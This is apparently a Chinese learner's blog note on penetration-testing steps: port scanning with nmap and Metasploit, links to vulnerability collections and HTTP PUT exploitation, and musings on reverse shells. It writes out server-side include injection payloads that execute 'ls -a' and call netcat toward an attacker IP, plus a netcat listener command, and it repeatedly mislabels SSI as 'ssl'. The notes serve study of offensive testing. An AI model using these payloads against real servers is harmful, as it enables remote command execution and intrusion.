nmap后或其他扫描(不太确定),配合portscan能读取前面扫面结果,适配关键字,可以直接尝试,或针对可能性大的进一步试探,确定后再利用(exploit)。
(11条消息) msf 端口扫描_aFa攻防实验室的博客-CSDN博客_msf 扫端口
web渗透实用操作----端口扫描 精简实用版 - FreeBuf网络安全行业门户
(11条消息) 35.网络安全渗透测试—[信息收集篇4]—[端口扫描/常见端口服务]_qwsn的博客-CSDN博客
之后查看msf渗透过程(或红队评估--freebuf),以及一些安全测试漏洞大全。
安全测试漏洞大全 - zha0gongz1 - 博客园 (cnblogs.com)
查看上面的,看到了netcat工具,有印象,监听,用来链接反弹shell的。
<!--#exec cmd="ls -a" -->
<!--#exec cmd="nc ip" -->
kali端输入:nc -nlvp port 端口貌似是自己定个空闲端口就行
来自ssl注入,开发人员在静态HTML中嵌入小片段动态代码于开发服务器,为了方便服务器不处理全部代码。--基本禁用ssl
安全研究 | 多种方式利用HTTP PUT方法漏洞 - 腾讯云开发者社区-腾讯云 (tencent.com)
刚好上面看到ssl利用的是ncat,再查的看到的是利用msfvenom生成shell,正对此疑问,这篇既有可能解决http_put,又有可能解决我对msfvenom的疑问,所谓一箭双雕,之前感觉越看越多,到后面就联系起来了。
标签:漏洞,端口扫描,端口,博客,ssl,msf,first From: https://www.cnblogs.com/lfd-dnbh/p/16571692.html